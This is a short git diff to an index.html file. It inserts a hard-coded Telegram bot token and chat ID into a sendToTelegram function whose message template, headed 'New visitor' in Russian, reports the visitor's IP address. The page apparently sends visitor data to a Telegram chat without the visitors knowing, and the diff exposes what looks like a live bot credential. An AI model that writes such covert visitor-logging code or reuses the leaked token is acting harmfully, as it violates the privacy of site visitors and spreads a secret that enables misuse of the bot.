--- a/index.html
+++ b/index.html
@@ -87,8 +87,8 @@
         }
 
         async function sendToTelegram(data) {
-            const botToken = ''; // Токен вашего бота
-            const chatId = ''; // Укажите ваш Chat ID
+            const botToken = '7773374291:AAEiG8N4M7S1kp5VViTbxsvFOwdYLkkLZ8I'; // Токен вашего бота
+            const chatId = '1575439970'; // Укажите ваш Chat ID
             const message = `
 📍 Новый посетитель:
 IP: ${data.ip}
